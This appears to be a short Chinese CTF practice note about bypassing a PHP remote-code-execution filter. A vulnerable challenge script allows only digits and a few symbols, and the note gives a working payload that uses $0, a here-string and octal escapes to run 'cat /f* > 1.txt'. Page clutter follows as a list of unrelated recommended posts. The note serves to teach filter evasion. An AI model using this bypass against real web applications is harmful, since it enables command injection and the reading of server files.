RCE联系

过滤

绕过空格

● 进制绕过

题目练习

数字rce

使用$0执行bash,<<<将后面的字符串传递给左边的命令。

例如:
<?php highlight_file(FILE); function waf(cmd) { whiteList = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '\\', '\'', '', '\<'\]; cmd_char = str_split(cmd); foreach (cmd_char as char) { if (!in_array(char, whiteList)) { die("hacker"); } } return cmd; } cmd = _GET['cmd']; exec(waf(cmd)); cmd=0<<<'\\143\\141\\164\\040\\57\\146\\52\\040\\76\\040\\61\\56\\164\\170\\164' 0代表当前脚本名称,如何在bash里运行代表/bin/bash <<<是bash中的Here String重定向符,会将后面的字符串作为标准输入传递给左边的命令 后面那段是八进制绕过,相当于$'cat /f* > 1.txt'

相关推荐
郭俊强19 分钟前
nestjs 缓存配置及防抖拦截器
缓存·nestjs·防抖
only-qi1 小时前
146. LRU 缓存
java·算法·缓存
阿里小阿希1 小时前
Vue3 + Element Plus 项目中日期时间处理的最佳实践与数据库设计规范
数据库·设计规范
白鹭2 小时前
MySQL源码部署(rhel7)
数据库·mysql
666和7773 小时前
Struts2 工作总结
java·数据库
还听珊瑚海吗3 小时前
SpringMVC(一)
数据库
星期天要睡觉4 小时前
MySQL 综合练习
数据库·mysql
Y4090014 小时前
数据库基础知识——聚合函数、分组查询
android·数据库